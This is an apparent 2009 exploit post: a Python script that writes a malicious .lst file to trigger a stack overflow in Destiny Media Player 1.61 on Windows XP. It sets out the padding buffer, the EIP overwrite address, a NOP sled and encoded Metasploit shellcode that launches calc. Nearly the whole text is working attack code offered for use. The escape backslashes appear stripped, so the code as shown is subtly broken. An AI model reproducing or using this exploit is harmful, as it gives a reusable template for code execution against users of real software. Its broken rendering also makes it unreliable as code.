dmp161lst4-overflow.txt
Posted on 06 January 2009
#usage: exploit.py print "**************************************************************************" print " Destiny Media Player 1.61 (.lst File) Local Stack Overflow Exploit " print " Founder: Encrypt3d.M!nd" print " exploit & code: Stack" print " Tested on: Windows XP Pro SP2 Fr " print " Greetings to:" print " All friends " print "**************************************************************************" buff = "x41" * 2052 EIP = "x5Dx38x82x7C" #call ESP from kernel32.dll nop = "x90" * 10 # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9" "x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05" "xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09" "x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d" "xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26" "x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64" "xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb" "xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28" "xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44" "x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38" "xacx2cxc9x40" ) exploit = buff + EIP + nop + shellcode try: out_file = open("Stack.lst",'w') out_file.write(exploit) out_file.close() raw_input(" Exploit file created! ") except: print "Error"
